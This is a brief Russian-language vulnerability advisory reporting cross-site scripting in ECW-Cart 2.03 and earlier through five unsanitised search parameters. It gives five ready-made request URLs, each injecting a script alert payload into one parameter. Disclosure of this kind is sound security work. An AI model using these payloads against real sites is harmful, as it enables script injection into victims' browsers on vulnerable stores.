Программа: ECW-Cart 2.03 и более ранние версии
Удаленный пользователь может произвести XSS нападение. Уязвимость существует
из-за недостаточной обработки входных данных в параметрах "kword", "max", "min",
"comp" и "f". Удаленный пользователь может с помощью специально сформированного
запроса выполнить произвольный HTML код в браузере жертвы в контексте
безопасности уязвимого сайта.
Пример:
/index.cgi?c=search&s=ok&id=191&kword=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&f=r0t+XSS&comp=0&min=&max=
/index.cgi?c=search&s=ok&id=191&kword=&f=r0t+XSS&comp=0&min=&max=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E
/index.cgi?c=search&s=ok&id=191&kword=&f=r0t+XSS&comp=0&min=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E
/index.cgi?c=search&s=ok&id=191&kword=&f=r0t+XSS&comp=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E
/index.cgi?c=search&s=ok&id=191&kword=&f=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E
